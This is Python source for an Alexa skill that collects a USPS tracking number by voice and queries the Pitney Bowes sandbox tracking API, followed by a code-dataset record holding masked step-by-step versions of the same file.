reprompt_text = "Now give the next eleven numbers"
try:
tracking_number_1 = intent['slots']['One']['value']
tracking_number_2 = intent['slots']['Two']['value']
tracking_number_3 = intent['slots']['Three']['value']
tracking_number_4 = intent['slots']['Four']['value']
tracking_number_5 = intent['slots']['Five']['value']
tracking_number_6 = intent['slots']['Six']['value']
tracking_number_7 = intent['slots']['Seven']['value']
tracking_number_8 = intent['slots']['Eight']['value']
tracking_number_9 = intent['slots']['Nine']['value']
tracking_number_10 = intent['slots']['Ten']['value']
first_ten = "%s%s%s%s%s%s%s%s%s%s" % (tracking_number_1, tracking_number_2,tracking_number_3, tracking_number_4,tracking_number_5, tracking_number_6,tracking_number_7, tracking_number_8,tracking_number_9, tracking_number_10)
session_attributes['first_ten'] = first_ten
print("session after adding first ten--->")
print(session_attributes)
except Exception as app_exception:
traceback.print_tb
speech_output = "There was some problem, Please provide first ten digits of the tracking number"
reprompt_text = "Please say first ten digits of the tracking number"
return build_response(session_attributes, build_speechlet_response(
intent['name'], speech_output, reprompt_text, should_end_session))
#----- get tracking ------
def getParcelStatus(intent, session):
session_attributes = {}
should_end_session = True
speech_output = "There was some problem in taking your input"
reprompt_text = "Please say remaining digits of the tracking number"
try:
tracking_number_11= intent['slots']['Eleven']['value']
tracking_number_12 = intent['slots']['Twelve']['value']
tracking_number_13 = intent['slots']['Thirteen']['value']
tracking_number_14 = intent['slots']['Fourteen']['value']
tracking_number_15 = intent['slots']['Fifteen']['value']
tracking_number_16 = intent['slots']['Sixteen']['value']
tracking_number_17 = intent['slots']['Seventeen']['value']
tracking_number_18 = intent['slots']['Eighteen']['value']
tracking_number_19 = intent['slots']['Nineteen']['value']
tracking_number_20 = intent['slots']['Twenty']['value']
tracking_number_21 = intent['slots']['TwentyOne']['value']
tracking_number_22 = intent['slots']['TwentyTwo']['value']
tracking_number = "%s%s%s%s%s%s%s%s%s%s%s%s" % (tracking_number_11,tracking_number_12, tracking_number_13, tracking_number_14,tracking_number_15, tracking_number_16,tracking_number_17, tracking_number_18,tracking_number_19, tracking_number_20,tracking_number_21, tracking_number_22)
print("'first_ten' not in session['attributes']--->")
print('first_ten' not in session['attributes'])
full_tracking_number = "%s%s" % (session['attributes']['first_ten'], tracking_number)
bearer = "Bearer %s" % (session['access_token'])
print("USPS FULL Tracking Number ----> %s" % (full_tracking_number))
url = "https://api-sandbox.pitneybowes.com/shippingservices/v1/tracking/%s?packageIdentifierType=TrackingNumber&carrier=USPS" %(full_tracking_number)
r=requests.get(url, headers={"Authorization" : bearer})
tracking_response = {}
tracking_response = json.loads(r.content)
if(r.status_code == 200):
speech_output = "The status of the parcel is "+tracking_response['status']
reprompt_text = "The status of the parcel is "+tracking_response['status']
else:
speech_output = tracking_response['errors'][0]['errorDescription']
reprompt_text = tracking_response['errors'][0]['errorDescription']
print(r.content)
except Exception as app_exception:
traceback.print_tb
should_end_session = False
if ('attributes' not in session or ('attributes' in session and 'first_ten' not in session['attributes'])):
speech_output = "Please provide only first ten digits of the tracking number"
reprompt_text = "Please provide only first ten digits of the tracking number"
else:
speech_output = "There was some problem, Please say remaining digits of the tracking number"
reprompt_text = "Please say remaining digits of the tracking number"
return build_response(session_attributes, build_speechlet_response(
intent['name'], speech_output, reprompt_text, should_end_session))
# --------------- Events ------------------
def on_session_started(session_started_request, session):
""" Called when the session starts """
print("on_session_started requestId=" + session_started_request['requestId']
+ ", sessionId=" + session['sessionId'])
def on_launch(launch_request, session):
""" Called when the user launches the skill without specifying what they
want
"""
print("on_launch requestId=" + launch_request['requestId'] +
", sessionId=" + session['sessionId'])
# Dispatch to your skill's launch
return get_welcome_response()
def oauth_request(session):
access_key = os.environ['key']
access_key_value = "Basic "+access_key
url = 'https://api-sandbox.pitneybowes.com/oauth/token'
r = requests.post(url, headers={"Authorization": access_key_value,
"Content-Type": "application/x-www-form-urlencoded"},
data={"grant_type": "client_credentials"})
print(r.status_code)
if(r.status_code == 200):
j = json.loads(r.content)
print(j)
session['access_token'] = j['access_token']
def on_intent(intent_request, session):
""" Called when the user specifies an intent for this skill """
print("on_intent requestId=" + intent_request['requestId'] +
", sessionId=" + session['sessionId'])
intent = intent_request['intent']
intent_name = intent_request['intent']['name']
if('access_token' not in session):
oauth_request(session)
print(session['access_token'])
# Dispatch to your skill's intent handlers
if intent_name == "Tracking":
return setFirstEleven(intent, session)
elif intent_name == "TrackingSecond":
return getParcelStatus(intent, session)
elif intent_name == "AMAZON.HelpIntent":
return get_welcome_response()
elif intent_name == "AMAZON.CancelIntent" or intent_name == "AMAZON.StopIntent":
return handle_session_end_request()
else:
raise ValueError("Invalid intent")
def on_session_ended(session_ended_request, session):
""" Called when the user ends the session.
Is not called when the skill returns should_end_session=true
"""
print("on_session_ended requestId=" + session_ended_request['requestId'] +
", sessionId=" + session['sessionId'])
# add cleanup logic here
# --------------- Main handler ------------------
def lambda_handler(event, context):
""" Route the incoming request based on type (LaunchRequest, IntentRequest,
etc.) The JSON body of the request is provided in the event parameter.
"""
print("event.session.application.applicationId=" +
event['session']['application']['applicationId'])
"""
Uncomment this if statement and populate with your skill's application ID to
prevent someone else from configuring a skill that sends requests to this
function.
"""
# if (event['session']['application']['applicationId'] !=
# "amzn1.echo-sdk-ams.app.[unique-value-here]"):
# raise ValueError("Invalid Application ID")
if event['session']['new']:
on_session_started({'requestId': event['request']['requestId']},
event['session'])
if event['request']['type'] == "LaunchRequest":
return on_launch(event['request'], event['session'])
elif event['request']['type'] == "IntentRequest":
return on_intent(event['request'], event['session'])
elif event['request']['type'] == "SessionEndedRequest":
return on_session_ended(event['request'], event['session'])
|
flexible
|
{
"blob_id": "a5ef2adbf85b5ab80c59697340f94bc57d60952e",
"index": 4463,
"step-1": "<mask token>\n\n\ndef build_response(session_attributes, speechlet_response):\n return {'version': '1.0', 'sessionAttributes': session_attributes,\n 'response': speechlet_response}\n\n\ndef get_welcome_response():\n \"\"\" If we wanted to initialize the session to have some attributes we could\n add those here\n \"\"\"\n session_attributes = {}\n card_title = 'Welcome to PB Parcel Tracker'\n speech_output = 'Please give first 10 digits of tracking number'\n reprompt_text = 'Please give first 10 digits of tracking number'\n should_end_session = False\n return build_response(session_attributes, build_speechlet_response(\n card_title, speech_output, reprompt_text, should_end_session))\n\n\ndef handle_session_end_request():\n card_title = 'Session Ended'\n speech_output = (\n 'Thank you for trying the Alexa Skills Kit sample. Have a nice day! ')\n should_end_session = True\n return build_response({}, build_speechlet_response(card_title,\n speech_output, None, should_end_session))\n\n\n<mask token>\n\n\ndef on_session_started(session_started_request, session):\n \"\"\" Called when the session starts \"\"\"\n print('on_session_started requestId=' + session_started_request[\n 'requestId'] + ', sessionId=' + session['sessionId'])\n\n\ndef on_launch(launch_request, session):\n \"\"\" Called when the user launches the skill without specifying what they\n want\n \"\"\"\n print('on_launch requestId=' + launch_request['requestId'] +\n ', sessionId=' + session['sessionId'])\n return get_welcome_response()\n\n\ndef oauth_request(session):\n access_key = os.environ['key']\n access_key_value = 'Basic ' + access_key\n url = 'https://api-sandbox.pitneybowes.com/oauth/token'\n r = requests.post(url, headers={'Authorization': access_key_value,\n 'Content-Type': 'application/x-www-form-urlencoded'}, data={\n 'grant_type': 'client_credentials'})\n print(r.status_code)\n if r.status_code == 200:\n j = json.loads(r.content)\n print(j)\n session['access_token'] = j['access_token']\n\n\ndef on_intent(intent_request, session):\n \"\"\" Called when the user specifies an intent for this skill \"\"\"\n print('on_intent requestId=' + intent_request['requestId'] +\n ', sessionId=' + session['sessionId'])\n intent = intent_request['intent']\n intent_name = intent_request['intent']['name']\n if 'access_token' not in session:\n oauth_request(session)\n print(session['access_token'])\n if intent_name == 'Tracking':\n return setFirstEleven(intent, session)\n elif intent_name == 'TrackingSecond':\n return getParcelStatus(intent, session)\n elif intent_name == 'AMAZON.HelpIntent':\n return get_welcome_response()\n elif intent_name == 'AMAZON.CancelIntent' or intent_name == 'AMAZON.StopIntent':\n return handle_session_end_request()\n else:\n raise ValueError('Invalid intent')\n\n\ndef on_session_ended(session_ended_request, session):\n \"\"\" Called when the user ends the session.\n\n Is not called when the skill returns should_end_session=true\n \"\"\"\n print('on_session_ended requestId=' + session_ended_request['requestId'\n ] + ', sessionId=' + session['sessionId'])\n\n\ndef lambda_handler(event, context):\n \"\"\" Route the incoming request based on type (LaunchRequest, IntentRequest,\n etc.) The JSON body of the request is provided in the event parameter.\n \"\"\"\n print('event.session.application.applicationId=' + event['session'][\n 'application']['applicationId'])\n \"\"\"\n Uncomment this if statement and populate with your skill's application ID to\n prevent someone else from configuring a skill that sends requests to this\n function.\n \"\"\"\n if event['session']['new']:\n on_session_started({'requestId': event['request']['requestId']},\n event['session'])\n if event['request']['type'] == 'LaunchRequest':\n return on_launch(event['request'], event['session'])\n elif event['request']['type'] == 'IntentRequest':\n return on_intent(event['request'], event['session'])\n elif event['request']['type'] == 'SessionEndedRequest':\n return on_session_ended(event['request'], event['session'])\n",
"step-2": "<mask token>\n\n\ndef build_response(session_attributes, speechlet_response):\n return {'version': '1.0', 'sessionAttributes': session_attributes,\n 'response': speechlet_response}\n\n\ndef get_welcome_response():\n \"\"\" If we wanted to initialize the session to have some attributes we could\n add those here\n \"\"\"\n session_attributes = {}\n card_title = 'Welcome to PB Parcel Tracker'\n speech_output = 'Please give first 10 digits of tracking number'\n reprompt_text = 'Please give first 10 digits of tracking number'\n should_end_session = False\n return build_response(session_attributes, build_speechlet_response(\n card_title, speech_output, reprompt_text, should_end_session))\n\n\ndef handle_session_end_request():\n card_title = 'Session Ended'\n speech_output = (\n 'Thank you for trying the Alexa Skills Kit sample. Have a nice day! ')\n should_end_session = True\n return build_response({}, build_speechlet_response(card_title,\n speech_output, None, should_end_session))\n\n\n<mask token>\n\n\ndef getParcelStatus(intent, session):\n session_attributes = {}\n should_end_session = True\n speech_output = 'There was some problem in taking your input'\n reprompt_text = 'Please say remaining digits of the tracking number'\n try:\n tracking_number_11 = intent['slots']['Eleven']['value']\n tracking_number_12 = intent['slots']['Twelve']['value']\n tracking_number_13 = intent['slots']['Thirteen']['value']\n tracking_number_14 = intent['slots']['Fourteen']['value']\n tracking_number_15 = intent['slots']['Fifteen']['value']\n tracking_number_16 = intent['slots']['Sixteen']['value']\n tracking_number_17 = intent['slots']['Seventeen']['value']\n tracking_number_18 = intent['slots']['Eighteen']['value']\n tracking_number_19 = intent['slots']['Nineteen']['value']\n tracking_number_20 = intent['slots']['Twenty']['value']\n tracking_number_21 = intent['slots']['TwentyOne']['value']\n tracking_number_22 = intent['slots']['TwentyTwo']['value']\n tracking_number = '%s%s%s%s%s%s%s%s%s%s%s%s' % (tracking_number_11,\n tracking_number_12, tracking_number_13, tracking_number_14,\n tracking_number_15, tracking_number_16, tracking_number_17,\n tracking_number_18, tracking_number_19, tracking_number_20,\n tracking_number_21, tracking_number_22)\n print(\"'first_ten' not in session['attributes']--->\")\n print('first_ten' not in session['attributes'])\n full_tracking_number = '%s%s' % (session['attributes']['first_ten'],\n tracking_number)\n bearer = 'Bearer %s' % session['access_token']\n print('USPS FULL Tracking Number ----> %s' % full_tracking_number)\n url = (\n 'https://api-sandbox.pitneybowes.com/shippingservices/v1/tracking/%s?packageIdentifierType=TrackingNumber&carrier=USPS'\n % full_tracking_number)\n r = requests.get(url, headers={'Authorization': bearer})\n tracking_response = {}\n tracking_response = json.loads(r.content)\n if r.status_code == 200:\n speech_output = 'The status of the parcel is ' + tracking_response[\n 'status']\n reprompt_text = 'The status of the parcel is ' + tracking_response[\n 'status']\n else:\n speech_output = tracking_response['errors'][0]['errorDescription']\n reprompt_text = tracking_response['errors'][0]['errorDescription']\n print(r.content)\n except Exception as app_exception:\n traceback.print_tb\n should_end_session = False\n if ('attributes' not in session or 'attributes' in session and \n 'first_ten' not in session['attributes']):\n speech_output = (\n 'Please provide only first ten digits of the tracking number')\n reprompt_text = (\n 'Please provide only first ten digits of the tracking number')\n else:\n speech_output = (\n 'There was some problem, Please say remaining digits of the tracking number'\n )\n reprompt_text = (\n 'Please say remaining digits of the tracking number')\n return build_response(session_attributes, build_speechlet_response(\n intent['name'], speech_output, reprompt_text, should_end_session))\n\n\ndef on_session_started(session_started_request, session):\n \"\"\" Called when the session starts \"\"\"\n print('on_session_started requestId=' + session_started_request[\n 'requestId'] + ', sessionId=' + session['sessionId'])\n\n\ndef on_launch(launch_request, session):\n \"\"\" Called when the user launches the skill without specifying what they\n want\n \"\"\"\n print('on_launch requestId=' + launch_request['requestId'] +\n ', sessionId=' + session['sessionId'])\n return get_welcome_response()\n\n\ndef oauth_request(session):\n access_key = os.environ['key']\n access_key_value = 'Basic ' + access_key\n url = 'https://api-sandbox.pitneybowes.com/oauth/token'\n r = requests.post(url, headers={'Authorization': access_key_value,\n 'Content-Type': 'application/x-www-form-urlencoded'}, data={\n 'grant_type': 'client_credentials'})\n print(r.status_code)\n if r.status_code == 200:\n j = json.loads(r.content)\n print(j)\n session['access_token'] = j['access_token']\n\n\ndef on_intent(intent_request, session):\n \"\"\" Called when the user specifies an intent for this skill \"\"\"\n print('on_intent requestId=' + intent_request['requestId'] +\n ', sessionId=' + session['sessionId'])\n intent = intent_request['intent']\n intent_name = intent_request['intent']['name']\n if 'access_token' not in session:\n oauth_request(session)\n print(session['access_token'])\n if intent_name == 'Tracking':\n return setFirstEleven(intent, session)\n elif intent_name == 'TrackingSecond':\n return getParcelStatus(intent, session)\n elif intent_name == 'AMAZON.HelpIntent':\n return get_welcome_response()\n elif intent_name == 'AMAZON.CancelIntent' or intent_name == 'AMAZON.StopIntent':\n return handle_session_end_request()\n else:\n raise ValueError('Invalid intent')\n\n\ndef on_session_ended(session_ended_request, session):\n \"\"\" Called when the user ends the session.\n\n Is not called when the skill returns should_end_session=true\n \"\"\"\n print('on_session_ended requestId=' + session_ended_request['requestId'\n ] + ', sessionId=' + session['sessionId'])\n\n\ndef lambda_handler(event, context):\n \"\"\" Route the incoming request based on type (LaunchRequest, IntentRequest,\n etc.) The JSON body of the request is provided in the event parameter.\n \"\"\"\n print('event.session.application.applicationId=' + event['session'][\n 'application']['applicationId'])\n \"\"\"\n Uncomment this if statement and populate with your skill's application ID to\n prevent someone else from configuring a skill that sends requests to this\n function.\n \"\"\"\n if event['session']['new']:\n on_session_started({'requestId': event['request']['requestId']},\n event['session'])\n if event['request']['type'] == 'LaunchRequest':\n return on_launch(event['request'], event['session'])\n elif event['request']['type'] == 'IntentRequest':\n return on_intent(event['request'], event['session'])\n elif event['request']['type'] == 'SessionEndedRequest':\n return on_session_ended(event['request'], event['session'])\n",
"step-3": "<mask token>\n\n\ndef build_speechlet_response(title, output, reprompt_text, should_end_session):\n return {'outputSpeech': {'type': 'PlainText', 'text': output}, 'card':\n {'type': 'Simple', 'title': 'SessionSpeechlet - ' + title,\n 'content': 'SessionSpeechlet - ' + output}, 'reprompt': {\n 'outputSpeech': {'type': 'PlainText', 'text': reprompt_text}},\n 'shouldEndSession': should_end_session}\n\n\ndef build_response(session_attributes, speechlet_response):\n return {'version': '1.0', 'sessionAttributes': session_attributes,\n 'response': speechlet_response}\n\n\ndef get_welcome_response():\n \"\"\" If we wanted to initialize the session to have some attributes we could\n add those here\n \"\"\"\n session_attributes = {}\n card_title = 'Welcome to PB Parcel Tracker'\n speech_output = 'Please give first 10 digits of tracking number'\n reprompt_text = 'Please give first 10 digits of tracking number'\n should_end_session = False\n return build_response(session_attributes, build_speechlet_response(\n card_title, speech_output, reprompt_text, should_end_session))\n\n\ndef handle_session_end_request():\n card_title = 'Session Ended'\n speech_output = (\n 'Thank you for trying the Alexa Skills Kit sample. Have a nice day! ')\n should_end_session = True\n return build_response({}, build_speechlet_response(card_title,\n speech_output, None, should_end_session))\n\n\ndef setFirstEleven(intent, session):\n session_attributes = {}\n should_end_session = False\n speech_output = 'Now give remaining digits'\n reprompt_text = 'Now give the next eleven numbers'\n try:\n tracking_number_1 = intent['slots']['One']['value']\n tracking_number_2 = intent['slots']['Two']['value']\n tracking_number_3 = intent['slots']['Three']['value']\n tracking_number_4 = intent['slots']['Four']['value']\n tracking_number_5 = intent['slots']['Five']['value']\n tracking_number_6 = intent['slots']['Six']['value']\n tracking_number_7 = intent['slots']['Seven']['value']\n tracking_number_8 = intent['slots']['Eight']['value']\n tracking_number_9 = intent['slots']['Nine']['value']\n tracking_number_10 = intent['slots']['Ten']['value']\n first_ten = '%s%s%s%s%s%s%s%s%s%s' % (tracking_number_1,\n tracking_number_2, tracking_number_3, tracking_number_4,\n tracking_number_5, tracking_number_6, tracking_number_7,\n tracking_number_8, tracking_number_9, tracking_number_10)\n session_attributes['first_ten'] = first_ten\n print('session after adding first ten--->')\n print(session_attributes)\n except Exception as app_exception:\n traceback.print_tb\n speech_output = (\n 'There was some problem, Please provide first ten digits of the tracking number'\n )\n reprompt_text = 'Please say first ten digits of the tracking number'\n return build_response(session_attributes, build_speechlet_response(\n intent['name'], speech_output, reprompt_text, should_end_session))\n\n\ndef getParcelStatus(intent, session):\n session_attributes = {}\n should_end_session = True\n speech_output = 'There was some problem in taking your input'\n reprompt_text = 'Please say remaining digits of the tracking number'\n try:\n tracking_number_11 = intent['slots']['Eleven']['value']\n tracking_number_12 = intent['slots']['Twelve']['value']\n tracking_number_13 = intent['slots']['Thirteen']['value']\n tracking_number_14 = intent['slots']['Fourteen']['value']\n tracking_number_15 = intent['slots']['Fifteen']['value']\n tracking_number_16 = intent['slots']['Sixteen']['value']\n tracking_number_17 = intent['slots']['Seventeen']['value']\n tracking_number_18 = intent['slots']['Eighteen']['value']\n tracking_number_19 = intent['slots']['Nineteen']['value']\n tracking_number_20 = intent['slots']['Twenty']['value']\n tracking_number_21 = intent['slots']['TwentyOne']['value']\n tracking_number_22 = intent['slots']['TwentyTwo']['value']\n tracking_number = '%s%s%s%s%s%s%s%s%s%s%s%s' % (tracking_number_11,\n tracking_number_12, tracking_number_13, tracking_number_14,\n tracking_number_15, tracking_number_16, tracking_number_17,\n tracking_number_18, tracking_number_19, tracking_number_20,\n tracking_number_21, tracking_number_22)\n print(\"'first_ten' not in session['attributes']--->\")\n print('first_ten' not in session['attributes'])\n full_tracking_number = '%s%s' % (session['attributes']['first_ten'],\n tracking_number)\n bearer = 'Bearer %s' % session['access_token']\n print('USPS FULL Tracking Number ----> %s' % full_tracking_number)\n url = (\n 'https://api-sandbox.pitneybowes.com/shippingservices/v1/tracking/%s?packageIdentifierType=TrackingNumber&carrier=USPS'\n % full_tracking_number)\n r = requests.get(url, headers={'Authorization': bearer})\n tracking_response = {}\n tracking_response = json.loads(r.content)\n if r.status_code == 200:\n speech_output = 'The status of the parcel is ' + tracking_response[\n 'status']\n reprompt_text = 'The status of the parcel is ' + tracking_response[\n 'status']\n else:\n speech_output = tracking_response['errors'][0]['errorDescription']\n reprompt_text = tracking_response['errors'][0]['errorDescription']\n print(r.content)\n except Exception as app_exception:\n traceback.print_tb\n should_end_session = False\n if ('attributes' not in session or 'attributes' in session and \n 'first_ten' not in session['attributes']):\n speech_output = (\n 'Please provide only first ten digits of the tracking number')\n reprompt_text = (\n 'Please provide only first ten digits of the tracking number')\n else:\n speech_output = (\n 'There was some problem, Please say remaining digits of the tracking number'\n )\n reprompt_text = (\n 'Please say remaining digits of the tracking number')\n return build_response(session_attributes, build_speechlet_response(\n intent['name'], speech_output, reprompt_text, should_end_session))\n\n\ndef on_session_started(session_started_request, session):\n \"\"\" Called when the session starts \"\"\"\n print('on_session_started requestId=' + session_started_request[\n 'requestId'] + ', sessionId=' + session['sessionId'])\n\n\ndef on_launch(launch_request, session):\n \"\"\" Called when the user launches the skill without specifying what they\n want\n \"\"\"\n print('on_launch requestId=' + launch_request['requestId'] +\n ', sessionId=' + session['sessionId'])\n return get_welcome_response()\n\n\ndef oauth_request(session):\n access_key = os.environ['key']\n access_key_value = 'Basic ' + access_key\n url = 'https://api-sandbox.pitneybowes.com/oauth/token'\n r = requests.post(url, headers={'Authorization': access_key_value,\n 'Content-Type': 'application/x-www-form-urlencoded'}, data={\n 'grant_type': 'client_credentials'})\n print(r.status_code)\n if r.status_code == 200:\n j = json.loads(r.content)\n print(j)\n session['access_token'] = j['access_token']\n\n\ndef on_intent(intent_request, session):\n \"\"\" Called when the user specifies an intent for this skill \"\"\"\n print('on_intent requestId=' + intent_request['requestId'] +\n ', sessionId=' + session['sessionId'])\n intent = intent_request['intent']\n intent_name = intent_request['intent']['name']\n if 'access_token' not in session:\n oauth_request(session)\n print(session['access_token'])\n if intent_name == 'Tracking':\n return setFirstEleven(intent, session)\n elif intent_name == 'TrackingSecond':\n return getParcelStatus(intent, session)\n elif intent_name == 'AMAZON.HelpIntent':\n return get_welcome_response()\n elif intent_name == 'AMAZON.CancelIntent' or intent_name == 'AMAZON.StopIntent':\n return handle_session_end_request()\n else:\n raise ValueError('Invalid intent')\n\n\ndef on_session_ended(session_ended_request, session):\n \"\"\" Called when the user ends the session.\n\n Is not called when the skill returns should_end_session=true\n \"\"\"\n print('on_session_ended requestId=' + session_ended_request['requestId'\n ] + ', sessionId=' + session['sessionId'])\n\n\ndef lambda_handler(event, context):\n \"\"\" Route the incoming request based on type (LaunchRequest, IntentRequest,\n etc.) The JSON body of the request is provided in the event parameter.\n \"\"\"\n print('event.session.application.applicationId=' + event['session'][\n 'application']['applicationId'])\n \"\"\"\n Uncomment this if statement and populate with your skill's application ID to\n prevent someone else from configuring a skill that sends requests to this\n function.\n \"\"\"\n if event['session']['new']:\n on_session_started({'requestId': event['request']['requestId']},\n event['session'])\n if event['request']['type'] == 'LaunchRequest':\n return on_launch(event['request'], event['session'])\n elif event['request']['type'] == 'IntentRequest':\n return on_intent(event['request'], event['session'])\n elif event['request']['type'] == 'SessionEndedRequest':\n return on_session_ended(event['request'], event['session'])\n",
"step-4": "<mask token>\nfrom __future__ import print_function\nimport traceback\nimport requests\nimport os\nimport json\n\n\ndef build_speechlet_response(title, output, reprompt_text, should_end_session):\n return {'outputSpeech': {'type': 'PlainText', 'text': output}, 'card':\n {'type': 'Simple', 'title': 'SessionSpeechlet - ' + title,\n 'content': 'SessionSpeechlet - ' + output}, 'reprompt': {\n 'outputSpeech': {'type': 'PlainText', 'text': reprompt_text}},\n 'shouldEndSession': should_end_session}\n\n\ndef build_response(session_attributes, speechlet_response):\n return {'version': '1.0', 'sessionAttributes': session_attributes,\n 'response': speechlet_response}\n\n\ndef get_welcome_response():\n \"\"\" If we wanted to initialize the session to have some attributes we could\n add those here\n \"\"\"\n session_attributes = {}\n card_title = 'Welcome to PB Parcel Tracker'\n speech_output = 'Please give first 10 digits of tracking number'\n reprompt_text = 'Please give first 10 digits of tracking number'\n should_end_session = False\n return build_response(session_attributes, build_speechlet_response(\n card_title, speech_output, reprompt_text, should_end_session))\n\n\ndef handle_session_end_request():\n card_title = 'Session Ended'\n speech_output = (\n 'Thank you for trying the Alexa Skills Kit sample. Have a nice day! ')\n should_end_session = True\n return build_response({}, build_speechlet_response(card_title,\n speech_output, None, should_end_session))\n\n\ndef setFirstEleven(intent, session):\n session_attributes = {}\n should_end_session = False\n speech_output = 'Now give remaining digits'\n reprompt_text = 'Now give the next eleven numbers'\n try:\n tracking_number_1 = intent['slots']['One']['value']\n tracking_number_2 = intent['slots']['Two']['value']\n tracking_number_3 = intent['slots']['Three']['value']\n tracking_number_4 = intent['slots']['Four']['value']\n tracking_number_5 = intent['slots']['Five']['value']\n tracking_number_6 = intent['slots']['Six']['value']\n tracking_number_7 = intent['slots']['Seven']['value']\n tracking_number_8 = intent['slots']['Eight']['value']\n tracking_number_9 = intent['slots']['Nine']['value']\n tracking_number_10 = intent['slots']['Ten']['value']\n first_ten = '%s%s%s%s%s%s%s%s%s%s' % (tracking_number_1,\n tracking_number_2, tracking_number_3, tracking_number_4,\n tracking_number_5, tracking_number_6, tracking_number_7,\n tracking_number_8, tracking_number_9, tracking_number_10)\n session_attributes['first_ten'] = first_ten\n print('session after adding first ten--->')\n print(session_attributes)\n except Exception as app_exception:\n traceback.print_tb\n speech_output = (\n 'There was some problem, Please provide first ten digits of the tracking number'\n )\n reprompt_text = 'Please say first ten digits of the tracking number'\n return build_response(session_attributes, build_speechlet_response(\n intent['name'], speech_output, reprompt_text, should_end_session))\n\n\ndef getParcelStatus(intent, session):\n session_attributes = {}\n should_end_session = True\n speech_output = 'There was some problem in taking your input'\n reprompt_text = 'Please say remaining digits of the tracking number'\n try:\n tracking_number_11 = intent['slots']['Eleven']['value']\n tracking_number_12 = intent['slots']['Twelve']['value']\n tracking_number_13 = intent['slots']['Thirteen']['value']\n tracking_number_14 = intent['slots']['Fourteen']['value']\n tracking_number_15 = intent['slots']['Fifteen']['value']\n tracking_number_16 = intent['slots']['Sixteen']['value']\n tracking_number_17 = intent['slots']['Seventeen']['value']\n tracking_number_18 = intent['slots']['Eighteen']['value']\n tracking_number_19 = intent['slots']['Nineteen']['value']\n tracking_number_20 = intent['slots']['Twenty']['value']\n tracking_number_21 = intent['slots']['TwentyOne']['value']\n tracking_number_22 = intent['slots']['TwentyTwo']['value']\n tracking_number = '%s%s%s%s%s%s%s%s%s%s%s%s' % (tracking_number_11,\n tracking_number_12, tracking_number_13, tracking_number_14,\n tracking_number_15, tracking_number_16, tracking_number_17,\n tracking_number_18, tracking_number_19, tracking_number_20,\n tracking_number_21, tracking_number_22)\n print(\"'first_ten' not in session['attributes']--->\")\n print('first_ten' not in session['attributes'])\n full_tracking_number = '%s%s' % (session['attributes']['first_ten'],\n tracking_number)\n bearer = 'Bearer %s' % session['access_token']\n print('USPS FULL Tracking Number ----> %s' % full_tracking_number)\n url = (\n 'https://api-sandbox.pitneybowes.com/shippingservices/v1/tracking/%s?packageIdentifierType=TrackingNumber&carrier=USPS'\n % full_tracking_number)\n r = requests.get(url, headers={'Authorization': bearer})\n tracking_response = {}\n tracking_response = json.loads(r.content)\n if r.status_code == 200:\n speech_output = 'The status of the parcel is ' + tracking_response[\n 'status']\n reprompt_text = 'The status of the parcel is ' + tracking_response[\n 'status']\n else:\n speech_output = tracking_response['errors'][0]['errorDescription']\n reprompt_text = tracking_response['errors'][0]['errorDescription']\n print(r.content)\n except Exception as app_exception:\n traceback.print_tb\n should_end_session = False\n if ('attributes' not in session or 'attributes' in session and \n 'first_ten' not in session['attributes']):\n speech_output = (\n 'Please provide only first ten digits of the tracking number')\n reprompt_text = (\n 'Please provide only first ten digits of the tracking number')\n else:\n speech_output = (\n 'There was some problem, Please say remaining digits of the tracking number'\n )\n reprompt_text = (\n 'Please say remaining digits of the tracking number')\n return build_response(session_attributes, build_speechlet_response(\n intent['name'], speech_output, reprompt_text, should_end_session))\n\n\ndef on_session_started(session_started_request, session):\n \"\"\" Called when the session starts \"\"\"\n print('on_session_started requestId=' + session_started_request[\n 'requestId'] + ', sessionId=' + session['sessionId'])\n\n\ndef on_launch(launch_request, session):\n \"\"\" Called when the user launches the skill without specifying what they\n want\n \"\"\"\n print('on_launch requestId=' + launch_request['requestId'] +\n ', sessionId=' + session['sessionId'])\n return get_welcome_response()\n\n\ndef oauth_request(session):\n access_key = os.environ['key']\n access_key_value = 'Basic ' + access_key\n url = 'https://api-sandbox.pitneybowes.com/oauth/token'\n r = requests.post(url, headers={'Authorization': access_key_value,\n 'Content-Type': 'application/x-www-form-urlencoded'}, data={\n 'grant_type': 'client_credentials'})\n print(r.status_code)\n if r.status_code == 200:\n j = json.loads(r.content)\n print(j)\n session['access_token'] = j['access_token']\n\n\ndef on_intent(intent_request, session):\n \"\"\" Called when the user specifies an intent for this skill \"\"\"\n print('on_intent requestId=' + intent_request['requestId'] +\n ', sessionId=' + session['sessionId'])\n intent = intent_request['intent']\n intent_name = intent_request['intent']['name']\n if 'access_token' not in session:\n oauth_request(session)\n print(session['access_token'])\n if intent_name == 'Tracking':\n return setFirstEleven(intent, session)\n elif intent_name == 'TrackingSecond':\n return getParcelStatus(intent, session)\n elif intent_name == 'AMAZON.HelpIntent':\n return get_welcome_response()\n elif intent_name == 'AMAZON.CancelIntent' or intent_name == 'AMAZON.StopIntent':\n return handle_session_end_request()\n else:\n raise ValueError('Invalid intent')\n\n\ndef on_session_ended(session_ended_request, session):\n \"\"\" Called when the user ends the session.\n\n Is not called when the skill returns should_end_session=true\n \"\"\"\n print('on_session_ended requestId=' + session_ended_request['requestId'\n ] + ', sessionId=' + session['sessionId'])\n\n\ndef lambda_handler(event, context):\n \"\"\" Route the incoming request based on type (LaunchRequest, IntentRequest,\n etc.) The JSON body of the request is provided in the event parameter.\n \"\"\"\n print('event.session.application.applicationId=' + event['session'][\n 'application']['applicationId'])\n \"\"\"\n Uncomment this if statement and populate with your skill's application ID to\n prevent someone else from configuring a skill that sends requests to this\n function.\n \"\"\"\n if event['session']['new']:\n on_session_started({'requestId': event['request']['requestId']},\n event['session'])\n if event['request']['type'] == 'LaunchRequest':\n return on_launch(event['request'], event['session'])\n elif event['request']['type'] == 'IntentRequest':\n return on_intent(event['request'], event['session'])\n elif event['request']['type'] == 'SessionEndedRequest':\n return on_session_ended(event['request'], event['session'])\n",
